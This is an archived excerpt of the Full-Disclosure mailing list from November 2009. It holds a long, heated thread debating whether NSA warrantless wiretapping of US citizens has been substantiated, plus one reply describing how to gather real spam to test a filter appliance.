Message-ID: <A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>

--On Friday, November 06, 2009 10:46:39 -0600 Valdis.Kletnieks at vt.edu wrote:

> On Thu, 05 Nov 2009 21:47:41 CST, Paul Schmehl said:
>> > Getting back on topic, it is well-known, and proven, that the NSA has
>> > surveillence facilities inside  several U.S. telecom carriers.  You need
>> > only look inside one of AT&T's PoPs in San Francisco for proof.
>> >
>>
>> You know this to be true because you've looked for yourself, right?  You
>> didn't just take the world of a complete stranger quoted by a compliant
>> press at face value, did you?
>
> Hey Paul: Thanks for this enlightening point.  I've just realized that
> Mt Everest doesn't exist either, and we've all been taking the word of
> complete strangers quoted by a compliant National Geographic. All those
> pics are 'shopped, you can tell by the pixels.
>
> C'Mon Paul, quit being a total intentionally blind asshole.  You presumably
> know how things like BGP and packet forwarding work, and there's nice maps
> of most of the sub-ocean fiberoptic cables. Using a minute's *thought* would
> show that if the NSA wanted to do *any* surveillance in a reasonably
> efficient manner, they *would* have to create surveillance facilities at
> the major peering points and exchanges.
>
> You know how traceroute works.  The locations of all the trans-oceanic
> fiber cables are *very* well documented (they have to be, it sucks if you
> lose your cable because a trawler didn't know it was there).  From that,
> it's pretty easy to figure out where you want to put your intercept
> facilities.
>
> So you're stuck with one of two choices:
>
> 1) Believe that the NSA in fact didn't do any hoovering of transmissions even
> though they've come out and said they did.
>
> 2) Admit that they would indeed need a room right near the ATT PoP in SF
> right where the whistleblower said it was.
>
>> And of course Congress knew nothing about it, even though they had been
>> briefed about it dozens of times and never raised a single objection.
> ...
>> The fact that you believe that only those who violate their oath of office
>> are honest and only those who never violate their oath of office are
>> dishonest blinds you to the possibility that the truth lies somewhere in
>> between.
>
> You appear to be similarly blinded to the possibility that perhaps, just
> perhaps, the people in Congress had been... *gasp* lied to and the program
> misrepresented.  Because those fine upstanding guys at the intelligence
> and defense agencies would *never* do a thing like that, just like they
> were all telling the truth back in 1969 and everything that Daniel Ellsberg
> said was a lie.
>
> Oh, and they didn't actually illegally wiretap Ellserg during his trial, so
> there's no reason the judge should have dismissed all the charges.
>
> Which is a more sensible approach - to question and worry about the
> governments actual intentions *this* time (even though they may be innocent
> *this* time) because they've done similar major-scale shit multiple times in
> your lifetime, or to blindly accept what they say this time, even though
> they've pulled similar shit multiple times in your memory?
>
> "Fool me once, shame on you.  Fool me twice, shame on me".

The root claim is that the NSA was/is conducting illegal, warrantless 
surveillance on American citizens.  That claim has never been substantiated, 
and that is precisely my point.  If you know anything about internet routing 
(and I know you do), then you understand that to capture the traffic of 
terrorists you would have to be at a peering location where traffic is 
aggregated.

As I stated in an earlier response, it's akin to the bogus concern that many 
people express about system admins.  Gee, they can see everything I've got. 
Which is true, but beside the point.  The real question is, do they want to and 
are there safeguards against abuse.  I'm pretty certain the NSA has their hands 
full just trying to keep up with and track real threats.  I seriously doubt 
they give a shit about a phone conversation you have with your girlfriend where 
you discuss your sex life.

Now, if you are talking to jihadist radicals, then you shouldn't be surprised 
if the NSA takes an interest.  But snooping on ordinary Americans' every day 
conversations?  Please!  Do you seriously think they have the time, much less 
the interest?

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From michael.holstein at csuohio.edu  Fri Nov  6 21:46:53 2009
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 06 Nov 2009 16:46:53 -0500
Subject: [Full-disclosure] How to receive SPAM mail
In-Reply-To: <4AF474CF.60701@ec-penflue.net>
References: <4AF474CF.60701@ec-penflue.net>
Message-ID: <4AF4994D.1080006@csuohio.edu>


> I have a SPAM filter and virus firewall testing.
> So, I want to get the real SPAM is sent to a specific email address.
> What better way is there anything?
>   

I had to do a similar thing when doing a spam-appliance "vendor 
shakedown" .. what I did was setup a subdomain

eg: test.mycompany.com

and then create email IDs within that subdomain that had valid mailboxes

eg: bob at test.mycompany.com, suzie at test.mycompany.com, etc.

and then I used Google to search for "free offers" and "work from home", 
etc. and entered those IDs on about 100 different sites. There's tons of 
sites out there that you can sign-up for "hundreds of free offers" and 
whatnot.

Within days I was getting hundreds of messages per day for each ID.

Note .. they have to be valid mailboxes because you frequently need to 
reply to the "activation" email to make them work. You could setup a 
little script to wget any links in emails received and do "-O /dev/null" 
with the results .. but I just had all the accounts configured on a test 
machine in thunderbird so I could view what came through and the 
resulting "junk summary" emails.

The advantage of doing it as a subdomain (or just register another test 
domain) is that you can make the traffic go away entirely by deleting 
the DNS record.

Regards,

Michael Holstein
Cleveland State University


From quanticle at gmail.com  Sat Nov  7 00:07:17 2009
From: quanticle at gmail.com (Rohit Patnaik)
Date: Fri, 6 Nov 2009 18:07:17 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
	<5915.1257525999@turing-police.cc.vt.edu>
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>
Message-ID: <6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>

On Fri, Nov 6, 2009 at 1:25 PM, Paul Schmehl <pschmehl_lists at tx.rr.com>wrote:

> --On Friday, November 06, 2009 10:46:39 -0600 Valdis.Kletnieks at vt.eduwrote:
>
> > On Thu, 05 Nov 2009 21:47:41 CST, Paul Schmehl said:
> >> > Getting back on topic, it is well-known, and proven, that the NSA has
> >> > surveillence facilities inside  several U.S. telecom carriers.  You
> need
> >> > only look inside one of AT&T's PoPs in San Francisco for proof.
> >> >
> >>
> >> You know this to be true because you've looked for yourself, right?  You
> >> didn't just take the world of a complete stranger quoted by a compliant
> >> press at face value, did you?
> >
> > Hey Paul: Thanks for this enlightening point.  I've just realized that
> > Mt Everest doesn't exist either, and we've all been taking the word of
> > complete strangers quoted by a compliant National Geographic. All those
> > pics are 'shopped, you can tell by the pixels.
> >
> > C'Mon Paul, quit being a total intentionally blind asshole.  You
> presumably
> > know how things like BGP and packet forwarding work, and there's nice
> maps
> > of most of the sub-ocean fiberoptic cables. Using a minute's *thought*
> would
> > show that if the NSA wanted to do *any* surveillance in a reasonably
> > efficient manner, they *would* have to create surveillance facilities at
> > the major peering points and exchanges.
> >
> > You know how traceroute works.  The locations of all the trans-oceanic
> > fiber cables are *very* well documented (they have to be, it sucks if you
> > lose your cable because a trawler didn't know it was there).  From that,
> > it's pretty easy to figure out where you want to put your intercept
> > facilities.
> >
> > So you're stuck with one of two choices:
> >
> > 1) Believe that the NSA in fact didn't do any hoovering of transmissions
> even
> > though they've come out and said they did.
> >
> > 2) Admit that they would indeed need a room right near the ATT PoP in SF
> > right where the whistleblower said it was.
> >
> >> And of course Congress knew nothing about it, even though they had been
> >> briefed about it dozens of times and never raised a single objection.
> > ...
> >> The fact that you believe that only those who violate their oath of
> office
> >> are honest and only those who never violate their oath of office are
> >> dishonest blinds you to the possibility that the truth lies somewhere in
> >> between.
> >
> > You appear to be similarly blinded to the possibility that perhaps, just
> > perhaps, the people in Congress had been... *gasp* lied to and the
> program
> > misrepresented.  Because those fine upstanding guys at the intelligence
> > and defense agencies would *never* do a thing like that, just like they
> > were all telling the truth back in 1969 and everything that Daniel
> Ellsberg
> > said was a lie.
> >
> > Oh, and they didn't actually illegally wiretap Ellserg during his trial,
> so
> > there's no reason the judge should have dismissed all the charges.
> >
> > Which is a more sensible approach - to question and worry about the
> > governments actual intentions *this* time (even though they may be
> innocent
> > *this* time) because they've done similar major-scale shit multiple times
> in
> > your lifetime, or to blindly accept what they say this time, even though
> > they've pulled similar shit multiple times in your memory?
> >
> > "Fool me once, shame on you.  Fool me twice, shame on me".
>
> The root claim is that the NSA was/is conducting illegal, warrantless
> surveillance on American citizens.  That claim has never been
> substantiated,
> and that is precisely my point.  If you know anything about internet
> routing
> (and I know you do), then you understand that to capture the traffic of
> terrorists you would have to be at a peering location where traffic is
> aggregated.
>
> As I stated in an earlier response, it's akin to the bogus concern that
> many
> people express about system admins.  Gee, they can see everything I've got.
> Which is true, but beside the point.  The real question is, do they want to
> and
> are there safeguards against abuse.  I'm pretty certain the NSA has their
> hands
> full just trying to keep up with and track real threats.  I seriously doubt
> they give a shit about a phone conversation you have with your girlfriend
> where
> you discuss your sex life.
>
> Now, if you are talking to jihadist radicals, then you shouldn't be
> surprised
> if the NSA takes an interest.  But snooping on ordinary Americans' every
> day
> conversations?  Please!  Do you seriously think they have the time, much
> less
> the interest?
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> *******************************************
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

You say that claims about the NSA conducting warrantless wiretaps against US
citizens are unsubstantiated.  That is totally and blatantly false (
http://is.gd/4PcWV).  The linked article clearly states, "Mr. Bush's
executive order allowing some warrantless eavesdropping on those inside the
United States - including American citizens, permanent legal residents,
tourists and other foreigners - is based on classified legal opinions that
assert that the president has broad powers to order such searches, derived
in part from the September 2001 Congressional resolution authorizing him to
wage war on Al Qaeda and other terrorist groups, according to the officials
familiar with the N.S.A. operation."

And, in case you don't believe the other article, here (http://is.gd/4Pd1C)
is a Congressional Research Service article that goes into more detail about
the legal rationale behind the warrantless wiretapping program.

As the two links above show, the warrantless wiretapping program is real,
and was at least active throughout the term of the Bush administration.
Whether it is currently active is a matter that can be debated, but the fact
such a program existed and did spy on American citizens is well
substantiated.

As your own signature states, "It is as useless to argue with those who have
forsaken reason as it is to give medicine to the dead." Part of using reason
is acknowledging when there is substantiated evidence for the opposing point
of view.

--Rohit Patnaik
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091106/e99278c0/attachment.html 

From pschmehl_lists at tx.rr.com  Fri Nov  6 04:56:55 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Thu, 05 Nov 2009 22:56:55 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <20091106040331.3F9BD7BD6E@ws5-10.us4.outblaze.com>
References: <20091106040331.3F9BD7BD6E@ws5-10.us4.outblaze.com>
Message-ID: <C91342168AC1E29864693599@Macintosh-2.local>

--On November 5, 2009 10:03:31 PM -0600 Chris <r0ck at operamail.com> wrote:
>>
>> Sure, because we all know those rat bastards at the NSA and all those
>> federal judges don't give a shit about the USA or freedom or personal
>> rights.
>
> What do you say to the 99.99% approval rate?  Are the FBI and other
> enforcement agencies just that good or is there a rubber stamp at work
> here?
>

Not being privy to the process, I couldn't even say if the approval 
process is that high.  I'm not inclined to believe it simply because some 
reporter or secret source claimed it to be true.  You, of course, live 
with the absolute certainty that you know the truth and no other possible 
explanation is plausible than the one you believe.

I think this subject matter is far too complex for you to understand.  You 
require simple explanations for everything.  The government is always and 
wholly evil.  People who reveal secrets that they've sworn not to reveal 
always tell the truth.  Etc., etc.

>> When you forget that the people who work in government are just like
>> you, trying to make a living and do the best they can, it's easy to
>> depersonalize them and demonize them as if they're all blackhearted evil
>> turds.  Easy, that is, if you don't have much of a brain.
>
> What an idealistic view.  How quant.  I suppose you believe in truth,
> justice, and the American way as well.  This is 2009.  Wake up, Paul.
> The government is about one thing -- staying in existence.  Given your
> stance on other topics, I'm surprised you don't realize this.
>

Human nature doesn't change when you get hired by the government.  Motives 
will be the same as they are in every other field of endeavor.  Or do you 
seriously believe that as soon as one receives their first payroll check 
from Uncle Sam that they immediately become part and parcel of the evil 
empire?

BTW, it isn't the government that is about staying in existence so much as 
it is the politicians.  Change that, and you can change the government. 
Or is that to hard a concept to follow?

>
> Wow.  How did you pull that fact out of your ass?  Nobody mentioned
> violating their oaths of office...except you.  more diversionary
> bullshit.
>

Math wasn't your long suit, huh?

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From pschmehl_lists at tx.rr.com  Sat Nov  7 02:56:41 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Fri, 06 Nov 2009 20:56:41 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>	
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>	
	<5915.1257525999@turing-police.cc.vt.edu>	
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>
	<6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>
Message-ID: <C6C79A0AF76811AA34B3BD13@Macintosh-2.local>

--On November 6, 2009 6:07:17 PM -0600 Rohit Patnaik <quanticle at gmail.com> 
wrote:
>
> You say that claims about the NSA conducting warrantless wiretaps
> against US citizens are unsubstantiated.? That is totally and blatantly
> false (http://is.gd/4PcWV).

Right.  The New York Times prints an article claiming that a 
"whistleblower" has revealed the content of a secret Executive Order.  The 
Washington Post then repeats that claim, without any substantiation other 
than the supposed statement of an anonymous informant and unnamed 
"administration officials" quoting "classified information" without 
quoting anyone who can be questioned.  And you call the claim that it's 
unsubstantiated "totally and blatantly false".

Produce the Executive Order and we can call it substantiated.  Otherwise 
you're doing nothing other than blowing the same smoke that everyone else 
is.  The President (who should know) has stated publicly that he 
"authorized warrantless surveillance within the United States".  Note that 
he did not say "warrantless surveillance ***of US persons*** within the 
United States".

Attorney General Gonzales stated that the intelligence program involves 
?intercepts of contents of communications where one . . . party to the 
communication is outside the United States? and the government has ?a 
reasonable basis to conclude that one party to the communication is a 
member of al Qaeda, affiliated with al Qaeda, or a member of an 
organization affiliated with al Qaeda, or working in support of al 
Qaeda.?  (You really should read what you link to before using it as 
proof of your claims.)

Neither the President nor the Attorney General stated "we are spying on US 
persons without a warrant".  That claim is made by unnamed persons who 
cannot be questioned and reporters who repeat the claim without verifying 
that it's true.  If you want to believe that reporters never stretch the 
truth or make up facts, go ahead.  I know better.  I've been interviewed 
numerous times.  What reporters tell the public is a far cry from what 
their interviewees tell them.

Now it *is* reasonable to believe that terrorists outside the US might be 
talking to persons inside the US who are either involved in terrorism or 
considering being involved in terrorism.  It's also reasonable to believe 
that some of those persons might be US persons (a legal term meaning they 
are citizens or resident aliens), but that is a far cry from "Egads! 
They're spying on US citizens without a warrant!  Our rights are in 
jeopardy!"

If a US citizen is communicating with terrorists, then I have no problem 
with the NSA intercepting those communications.  Nor should you if you 
have a brain in your head.  OTOH, if the *FBI* wants to pursue legal 
action against that same person, then they are required to show probable 
cause and obtain a warrant.  But they can't get their evidence from the 
NSA.  The NSA can only supply the FBI with the information that there is a 
person of interest that they might want to open and investigation on. 
They cannot give them details and they cannot give them the intercepts. 
The FBI must then follow the normal course of law enforcement 
investigations, including probably cause, warrants, full protections of 
the Constitution, etc., etc.

>?The linked article clearly states, "Mr.
> Bush's executive order allowing some warrantless eavesdropping on those
> inside the United States - including American citizens, permanent legal
> residents, tourists and other foreigners - is based on classified legal
> opinions that assert that the president has broad powers to order such
> searches, derived in part from the September 2001 Congressional
> resolution authorizing him to wage war on Al Qaeda and other terrorist
> groups, according to the officials familiar with the N.S.A.
> operation."?
>

Yes, and no one has ever seen the source documents.  If you want to take 
someone's opinion that it's true, feel free to do so.  I do not.  If the 
New York Times want's to publish the Executive Order that they claim they 
know the contents of (as they did the Pentagon Papers years ago), then we 
can read it and see what it really said as opposed to what people opposed 
to the use of any surveillance at all claim to know about it.

> And, in case you don't believe the other article, here
> (http://is.gd/4Pd1C) is a Congressional Research Service article that
> goes into more detail about the legal rationale behind the warrantless
> wiretapping program.
>
> As the two links above show, the warrantless wiretapping program is
> real, and was at least active throughout the term of the Bush
> administration.? Whether it is currently active is a matter that can be
> debated, but the fact such a program existed and did spy on American
> citizens is well substantiated.
>

The first part of your statement is true.  The second part is 
unsubstantiated.  All we know for certain is that people in a position to 
know and willing to be quoted on the record have stated that calls between 
persons affiliated with terrorists and other persons were intercepted.  We 
don't know the status of those other persons.  We can only presume.

> As your own signature states, "It is as useless to argue with those who
> have forsaken reason as it is to give medicine to the dead." Part of
> using reason is acknowledging when there is substantiated evidence for
> the opposing point of view.
>

Yes, and when there is, I will agree with you.  Opinions and un-attributed 
claims are not substantiation.  Reason does not fall prey to opinion, even 
when those opinions are shouted loudly and any opposition to them is 
ridiculed.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From quanticle at gmail.com  Sat Nov  7 04:10:56 2009
From: quanticle at gmail.com (Rohit Patnaik)
Date: Fri, 6 Nov 2009 22:10:56 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <C6C79A0AF76811AA34B3BD13@Macintosh-2.local>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
	<5915.1257525999@turing-police.cc.vt.edu>
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>
	<6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>
	<C6C79A0AF76811AA34B3BD13@Macintosh-2.local>
Message-ID: <6a5e46470911062010y5400c465i2408c1ba6c3ef9d7@mail.gmail.com>

If it is so clear that a US citizen is involved in terrorism and is
communicating with terrorists beyond our borders, then why is it so hard for
the NSA, CIA, FBI or Homeland Security to get a warrant?  After all, its not
like they can claim that there wasn't time to get a warrant - the
pre-existing law allowed them to put in expedited requests for warrants
after the actual wiretap started, in addition to allowing continued use of
wiretaps while the warrant is being considered by the FISA court.  Secrecy
isn't a concern either - all proceedings of the FISA court are classified.
By what reasoning do these security agencies wish to further expand their
already considerable powers?

It seems to me that it is already far too easy for our national security
apparatus to spy on us without our permission or knowledge. The last thing I
want is to make such spying even easier for them.

--Rohit Patnaik

On Fri, Nov 6, 2009 at 8:56 PM, Paul Schmehl <pschmehl_lists at tx.rr.com>wrote:

> --On November 6, 2009 6:07:17 PM -0600 Rohit Patnaik <quanticle at gmail.com>
> wrote:
> >
> > You say that claims about the NSA conducting warrantless wiretaps
> > against US citizens are unsubstantiated.  That is totally and blatantly
> > false (http://is.gd/4PcWV).
>
> Right.  The New York Times prints an article claiming that a
> "whistleblower" has revealed the content of a secret Executive Order.  The
> Washington Post then repeats that claim, without any substantiation other
> than the supposed statement of an anonymous informant and unnamed
> "administration officials" quoting "classified information" without
> quoting anyone who can be questioned.  And you call the claim that it's
> unsubstantiated "totally and blatantly false".
>
> Produce the Executive Order and we can call it substantiated.  Otherwise
> you're doing nothing other than blowing the same smoke that everyone else
> is.  The President (who should know) has stated publicly that he
> "authorized warrantless surveillance within the United States".  Note that
> he did not say "warrantless surveillance ***of US persons*** within the
> United States".
>
> Attorney General Gonzales stated that the intelligence program involves
> ?intercepts of contents of communications where one . . . party to the
> communication is outside the United States? and the government has ?a
> reasonable basis to conclude that one party to the communication is a
> member of al Qaeda, affiliated with al Qaeda, or a member of an
> organization affiliated with al Qaeda, or working in support of al
> Qaeda.?  (You really should read what you link to before using it as
> proof of your claims.)
>
> Neither the President nor the Attorney General stated "we are spying on US
> persons without a warrant".  That claim is made by unnamed persons who
> cannot be questioned and reporters who repeat the claim without verifying
> that it's true.  If you want to believe that reporters never stretch the
> truth or make up facts, go ahead.  I know better.  I've been interviewed
> numerous times.  What reporters tell the public is a far cry from what
> their interviewees tell them.
>
> Now it *is* reasonable to believe that terrorists outside the US might be
> talking to persons inside the US who are either involved in terrorism or
> considering being involved in terrorism.  It's also reasonable to believe
> that some of those persons might be US persons (a legal term meaning they
> are citizens or resident aliens), but that is a far cry from "Egads!
> They're spying on US citizens without a warrant!  Our rights are in
> jeopardy!"
>
> If a US citizen is communicating with terrorists, then I have no problem
> with the NSA intercepting those communications.  Nor should you if you
> have a brain in your head.  OTOH, if the *FBI* wants to pursue legal
> action against that same person, then they are required to show probable
> cause and obtain a warrant.  But they can't get their evidence from the
> NSA.  The NSA can only supply the FBI with the information that there is a
> person of interest that they might want to open and investigation on.
> They cannot give them details and they cannot give them the intercepts.
> The FBI must then follow the normal course of law enforcement
> investigations, including probably cause, warrants, full protections of
> the Constitution, etc., etc.
>
> > The linked article clearly states, "Mr.
> > Bush's executive order allowing some warrantless eavesdropping on those
> > inside the United States - including American citizens, permanent legal
> > residents, tourists and other foreigners - is based on classified legal
> > opinions that assert that the president has broad powers to order such
> > searches, derived in part from the September 2001 Congressional
> > resolution authorizing him to wage war on Al Qaeda and other terrorist
> > groups, according to the officials familiar with the N.S.A.
> > operation."
> >
>
> Yes, and no one has ever seen the source documents.  If you want to take
> someone's opinion that it's true, feel free to do so.  I do not.  If the
> New York Times want's to publish the Executive Order that they claim they
> know the contents of (as they did the Pentagon Papers years ago), then we
> can read it and see what it really said as opposed to what people opposed
> to the use of any surveillance at all claim to know about it.
>
> > And, in case you don't believe the other article, here
> > (http://is.gd/4Pd1C) is a Congressional Research Service article that
> > goes into more detail about the legal rationale behind the warrantless
> > wiretapping program.
> >
> > As the two links above show, the warrantless wiretapping program is
> > real, and was at least active throughout the term of the Bush
> > administration.  Whether it is currently active is a matter that can be
> > debated, but the fact such a program existed and did spy on American
> > citizens is well substantiated.
> >
>
> The first part of your statement is true.  The second part is
> unsubstantiated.  All we know for certain is that people in a position to
> know and willing to be quoted on the record have stated that calls between
> persons affiliated with terrorists and other persons were intercepted.  We
> don't know the status of those other persons.  We can only presume.
>
> > As your own signature states, "It is as useless to argue with those who
> > have forsaken reason as it is to give medicine to the dead." Part of
> > using reason is acknowledging when there is substantiated evidence for
> > the opposing point of view.
> >
>
> Yes, and when there is, I will agree with you.  Opinions and un-attributed
> claims are not substantiation.  Reason does not fall prey to opinion, even
> when those opinions are shouted loudly and any opposition to them is
> ridiculed.
>
> Paul Schmehl, If it isn't already
> obvious, my opinions are my own
> and not those of my employer.
> ******************************************
> WARNING: Check the headers before replying
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091106/dd4e4e8b/attachment-0001.html 

From pschmehl_lists at tx.rr.com  Sat Nov  7 05:42:45 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Fri, 06 Nov 2009 23:42:45 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <6a5e46470911062010y5400c465i2408c1ba6c3ef9d7@mail.gmail.com>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>	
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>	
	<5915.1257525999@turing-police.cc.vt.edu>	
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>	
	<6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>	
	<C6C79A0AF76811AA34B3BD13@Macintosh-2.local>
	<6a5e46470911062010y5400c465i2408c1ba6c3ef9d7@mail.gmail.com>
Message-ID: <C2C452B5BDA47BF2E7304902@Macintosh-2.local>

--On November 6, 2009 10:10:56 PM -0600 Rohit Patnaik 
<quanticle at gmail.com> wrote:

> If it is so clear that a US citizen is involved in terrorism and is
> communicating with terrorists beyond our borders, then why is it so hard
> for the NSA, CIA, FBI or Homeland Security to get a warrant?

First of all, the NSA and CIA don't pursue criminal cases against US 
persons.  That's the job of law enforcement.  The NSA is a military 
agency.  Their job is to protect the US against its enemies by providing 
the military with intelligence that helps in planning and the conduct of 
operations.  The CIA is a civilian agency tasked with the job of gathering 
information about what other countries are doing, both friends and 
enemies.  Homeland Security's job is, well, who the hell knows?  It's a 
huge ponderous agency that, in my view, represents a much greater threat 
to us than the NSA or CIA.

But your question reveals a view of the issue that doesn't align with the 
facts.  The NSA isn't listening to US citizens' communications to detect 
any communications with terrorists.  They're listening to terrorists' 
communications which sometimes are to US citizens.  When that happens, of 
course the NSA is going to intercept to determine if it's an innocent call 
or something more.

>? After
> all, its not like they can claim that there wasn't time to get a warrant
> - the pre-existing law allowed them to put in expedited requests for
> warrants after the actual wiretap started, in addition to allowing
> continued use of wiretaps while the warrant is being considered by the
> FISA court.? Secrecy isn't a concern either - all proceedings of the
> FISA court are classified.? By what reasoning do these security
> agencies wish to further expand their already considerable powers?
>

The claim that is being made is that the existing law, written in 1978 
(before the IBM pc was even born), is unable to cope with the speed and 
variability of internet communications today.  If a terrorist whose 
communications are being intercepted "speaks" to someone (email, im, 
twitter, blog, forum, whatever) and tells them to contact a third party to 
conduct an operation, the NSA would want to intercept the third party's 
communications as well.  Under existing law (if you believe that FISA 
applies) they would have 72 hours maximum to submit the necessary 
paperwork and obtain the necessary approvals to go before the FISA court 
and obtain a warrant.  Otherwise they would have to cease all 
surveillance.  Meanwhile the terrorists aren't going to sit around waiting 
for the warrant to be issued to continue their plans.

> It seems to me that it is already far too easy for our national security
> apparatus to spy on us without our permission or knowledge. The last
> thing I want is to make such spying even easier for them.
>

They're not spying on us.  Intelligence agencies don't spy on us.  Law 
enforcement does.

I was involved in (signals) intelligence years ago.  I can assure you we 
could have cared less what US citizens were doing *unless* what they were 
doing involved working for a foreign power to steal secrets or undermine 
the US government or similar spy type activities.  Sure we could "see" 
what everybody was doing.  But we only cared about the enemies of our 
country (at that time the Russians and others).  IOW, we were "looking" 
away from the US.  If you came into our view it was because you were doing 
something suspicious in the context of foreign power surveillance.

Personally I believe the President has inherent Constitutional powers that 
authorize him to do what President Bush did (and many others before him 
have done) and what President Obama is probably doing now.  The courts, 
although they have never directly addressed the issue, appear to agree. 
In a case in 2002, the United States Foreign Intelligence Surveillance 
Court of Review wrote, in part, "Even without taking into account the 
President?s inherent constitutional authority to conduct warrantless 
foreign intelligence surveillance", which is an admission of the 
President's power to surveil the enemies of this country without having to 
jump through legal hoops to do so.

It would be quite interesting to have the FISA law be considered by the 
Supreme Court to determine if it really is a constitutional law.  I doubt 
that will ever happen, because, despite all the political rhetoric, no one 
really wants to go there.  They'd rather pontificate about it and try to 
score political points with it.

Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying


From quanticle at gmail.com  Sat Nov  7 17:20:31 2009
From: quanticle at gmail.com (Rohit Patnaik)
Date: Sat, 7 Nov 2009 11:20:31 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <C2C452B5BDA47BF2E7304902@Macintosh-2.local>
References: <20091106031229.3A47B7BD6E@ws5-10.us4.outblaze.com>
	<45ABF1F940775FBE91A6CD44@Macintosh-2.local>
	<5915.1257525999@turing-police.cc.vt.edu>
	<A19D5AF8D15E125558BA99A7@utd65257.utdallas.edu>
	<6a5e46470911061607q6e315983leba1e66084908170@mail.gmail.com>
	<C6C79A0AF76811AA34B3BD13@Macintosh-2.local>
	<6a5e46470911062010y5400c465i2408c1ba6c3ef9d7@mail.gmail.com>
	<C2C452B5BDA47BF2E7304902@Macintosh-2.local>
Message-ID: <6a5e46470911070920r6a58aea1of44b263838a04e43@mail.gmail.com>

The direction of the association doesn't matter. It doesn't matter if the
"terrorist" is contacting me, or if I'm contacting the terrorist.  In either
case, the US government should get a warrant before they spy on me.  Also,
this executive opinion doesn't just apply to the CIA and the NSA.  It
applies to the entire executive branch, including law enforcement.

Secondly, we seem to have a general disagreement about the intent of the
laws regulating the intelligence and law enforcement apparatus of the
state.  My opinion is that the restrictions placed on these agencies were
intentional.  They were created by a Congress that was disgusted by the
rampant abuse of executive power that occurred during the Nixon
administration.  They were strengthened when Reagan found loopholes in those
restrictions.  As such, I don't think its Constitutionally valid for the
President to unilaterally ignore those restrictions.  Yes, I'm aware of the
use of force resolution that was passed shortly following the Sept. 11th
attack.  However, I don't think the language contained therein represented a
rollback of over 30 years of legislative history.  If it is really necessary
for the intelligence agencies to have these unprecedented powers, then they
shouldn't be hesitant in presenting their case before Congress.

--Rohit Patnaik

On Fri, Nov 6, 2009 at 11:42 PM, Paul Schmehl <pschmehl_lists at tx.rr.com>wrote:

> --On November 6, 2009 10:10:56 PM -0600 Rohit Patnaik
> <quanticle at gmail.com> wrote:
>
> > If it is so clear that a US citizen is involved in terrorism and is
> > communicating with terrorists beyond our borders, then why is it so hard
> > for the NSA, CIA, FBI or Homeland Security to get a warrant?
>
> First of all, the NSA and CIA don't pursue criminal cases against US
> persons.  That's the job of law enforcement.  The NSA is a military
> agency.  Their job is to protect the US against its enemies by providing
> the military with intelligence that helps in planning and the conduct of
> operations.  The CIA is a civilian agency tasked with the job of gathering
> information about what other countries are doing, both friends and
> enemies.  Homeland Security's job is, well, who the hell knows?  It's a
> huge ponderous agency that, in my view, represents a much greater threat
> to us than the NSA or CIA.
>
> But your question reveals a view of the issue that doesn't align with the
> facts.  The NSA isn't listening to US citizens' communications to detect
> any communications with terrorists.  They're listening to terrorists'
> communications which sometimes are to US citizens.  When that happens, of
> course the NSA is going to intercept to determine if it's an innocent call
> or something more.
>
> >  After
> > all, its not like they can claim that there wasn't time to get a warrant
> > - the pre-existing law allowed them to put in expedited requests for
> > warrants after the actual wiretap started, in addition to allowing
> > continued use of wiretaps while the warrant is being considered by the
> > FISA court.  Secrecy isn't a concern either - all proceedings of the
> > FISA court are classified.  By what reasoning do these security
> > agencies wish to further expand their already considerable powers?
> >
>
> The claim that is being made is that the existing law, written in 1978
> (before the IBM pc was even born), is unable to cope with the speed and
> variability of internet communications today.  If a terrorist whose
